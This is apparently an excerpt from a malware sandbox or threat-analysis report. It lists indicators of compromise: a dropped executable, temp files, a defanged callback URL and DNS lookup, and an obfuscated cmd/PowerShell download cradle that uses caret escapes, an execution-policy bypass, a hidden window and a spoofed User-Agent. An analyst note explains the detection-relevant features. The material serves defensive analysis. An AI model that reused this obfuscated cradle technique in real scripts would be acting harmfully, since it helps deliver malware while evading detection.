Technical Information
- '%LOCALAPPDATA%\temptsd92.exe'
- <SYSTEM32>\wermgr.exe
- %LOCALAPPDATA%\temptsd92.exe
- %TEMP%\log5cb8.tmp
- %TEMP%\log5cb8.tmp
- http://ra##land.in/rare/rarleworld.php
- DNS ASK ra##land.in
- '<SYSTEM32>\cmd.exe' /c mgiHxlIuXGLMwja & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var....' (with hidden window)
  Note: the `^` characters are cmd.exe escape characters that are stripped before execution, so `Po^wEr^sh^elL.e^Xe` runs as `PowerShell.exe`; together with the split `'Net.W'`/`'ebClient'` strings (concatenated into `Net.WebClient`), `-executionpolicy bypass -noprofile -w hidden`, and the spoofed `User-Agent` header, this is consistent with an obfuscated download cradle. The command line is truncated in this listing (`$var....`), so what it retrieves cannot be confirmed from here; the caret-split PowerShell token and the `-executionpolicy bypass -w hidden` pair are the detection-relevant features.
- '<SYSTEM32>\cmd.exe' /c mgiHxlIuXGLMwja & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var....
- '<SYSTEM32>\wermgr.exe'